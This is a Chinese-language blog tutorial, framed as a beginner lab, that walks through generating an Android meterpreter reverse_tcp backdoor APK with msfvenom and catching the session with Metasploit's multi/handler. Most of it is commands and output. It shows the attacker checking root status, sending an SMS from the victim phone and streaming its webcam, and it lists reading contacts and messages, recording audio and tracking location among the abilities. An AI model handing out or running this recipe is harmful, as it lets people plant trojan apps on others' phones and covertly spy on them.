Kali之Metasploit生成apk后门控制安卓
扫盲教程,大佬勿喷。
实验中请更改为你环境的IP。
生成apk后门
Kali Linux(Hack):192.168.169.76
Android(靶机):192.168.169.137
启动kali,开终端,生成apk后门。仅有9.2k的apk,也是蛮吊
1 2 3 4 5 | root@kali:~# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.169.76 lport=445 R > Desktop/123.apkNo platform was selected, choosing Msf::Module::Platform::Android from the payloadNo Arch selected, selecting Arch: dalvik from the payloadNo encoder or badchars specified, outputting raw payloadPayload size: 9486 bytes |
lhost为kali的ip,lport指定一个端口。
开metasploit控制台侦听
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | root@kali:~# msfconsolemsf > use exploit/multi/handlermsf exploit(handler) > set payload android/meterpreter/reverse_tcp #设置payloadpayload => android/meterpreter/reverse_tcpmsf exploit(handler) > set lhost 192.168.169.76 #kali的IPlhost => 192.168.169.76msf exploit(handler) > set lport 445 #对应刚才设的端口lport => 445msf exploit(handler) > exploit [*] Started reverse TCP handler on 192.168.169.76:445[*] Starting the payload handler...[*] Sending stage (63194 bytes) to 192.168.169.137[*] Meterpreter session 1 opened (192.168.169.76:445 -> 192.168.169.137:45552) at 2017-09-28 01:36:01 -0400 |
复制apk出来装到手机上打开后就可以exploit了,会看到会话反弹回来。
可以看下帮助都有啥操作
meterpreter > help
功能示例
读取联系人,信息,拍照,录音,获取位置信息,上传下载文件等等,还是挺强大的。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 | #系统信息meterpreter > sysinfo Computer : localhostOS : Android 7.1.2 - Linux 3.18.31-gc725c42 (aarch64)Meterpreter : java/android#查看root状态meterpreter > check_root [+] Device is rooted#发送短信meterpreter > send_sms [-] You must enter both a destination address -d and the SMS text body -t[-] e.g. send_sms -d +351961234567 -t "GREETINGS PROFESSOR FALKEN."OPTIONS: -d <opt> Destination number -dr Wait for delivery report -h Help Banner -t <opt> SMS body textmeterpreter > send_sms -d +8610086 -t "我是你爸爸"[+] SMS sent - Transmission successfulmeterpreter > |
1 2 3 4 5 6 7 8 9 10 11 12 | #网页视频聊天(我手机没合适浏览器没打开)meterpreter > webcam_chat [*] Webcam chat session initialized.[-] Error running command webcam_chat: RuntimeError Unable to find a suitable browser on the target machine#网页摄像头视频流,显示实时画面meterpreter > webcam_stream [*] Starting...[*] Preparing player...[*] Opening player at: lwqAtUFm.html[*] Streaming... |
补充freebuf上的文章:
分类:
信息安全
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· C#/.NET/.NET Core优秀项目和框架2025年2月简报
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 【杭电多校比赛记录】2025“钉耙编程”中国大学生算法设计春季联赛(1)